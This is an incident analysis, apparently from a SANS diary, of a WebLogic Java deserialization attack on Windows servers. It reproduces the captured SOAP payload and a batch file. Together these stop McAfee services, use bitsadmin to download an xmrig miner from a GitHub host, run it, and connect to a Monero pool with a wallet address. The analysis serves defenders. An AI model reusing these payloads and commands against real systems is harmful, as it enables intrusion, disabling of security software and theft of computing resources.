Java Deserialization Attack Against Windows
Recently we talked a lot about attacks exploiting Java deserialization vulnerabilties in systems like Apache SOLR and WebLogic. Most of these attacks targeted Linux/Unix systems. But recently, I am seeing more attacks that target windows. For example:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3" >
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>net stop "McAfee McShield;net stop mcafeeframework;bitsadmin.exe /transfer "xmrig.bat" /download /priority foreground http://raw.githubusercontent.com/sirikun/starships/master/xmrig.bat "%cd%\xmrig.bat";bitsadmin.exe /transfer "xmrig.exe" /download /priority foreground http://raw.githubusercontent.com/sirikun/starships/master/xmrig.exe "%cd%\xmrig.exe;dir xmrig*;xmrig.bat;tasklist;</string>
</void>
</array>
<void method="start"/>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
The actual payload:
Turn off McAfee Antivirus (I am not sure what they only turn off McAfee. Any ideas?)
net stop "McAfee McShield;
net stop mcafeeframework;
Use bitsadmin to download the cryptominer and a batch file to start it from GitHub
bitsadmin.exe /transfer "xmrig.bat" /download /priority foreground http://raw.githubusercontent.com/sirikun/starships/master/xmrig.bat "%cd%\xmrig.bat";
bitsadmin.exe /transfer "xmrig.exe" /download /priority foreground http://raw.githubusercontent.com/sirikun/starships/master/xmrig.exe "%cd%\xmrig.exe;
dir xmrig*;
xmrig.bat;
tasklist;
The Batch file:
taskkill /im /f xmrig.exe /t
net stop "McAfee McShield"
net stop mcafeeframework
xmrig.exe -o monerohash.com:3333 -u 42jF56tc85UTZwhMQc6rHbMHTxHqK74qS2zqLyRZxLbwegsy7FJ9w4T5B69Ay5qeMEMuvVDwHNeopAxrEZkkHrMb5phovJ6 -p x --background --max-cpu-usage=50 --donate-level=1
First, it kills other xmrig processes (competition?) . Next, it again turns of McAfee. It then starts the miner and connects to the monerohash.com pool on port 3333. It only uses 50% of the CPU usage, likely to evade detection.
So far, this miner only "owns" about 350 Hashes/Second, and made a bit short of 40 Monero so far (about $ 7,000) .
---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS Technology Institute
Twitter|
Comments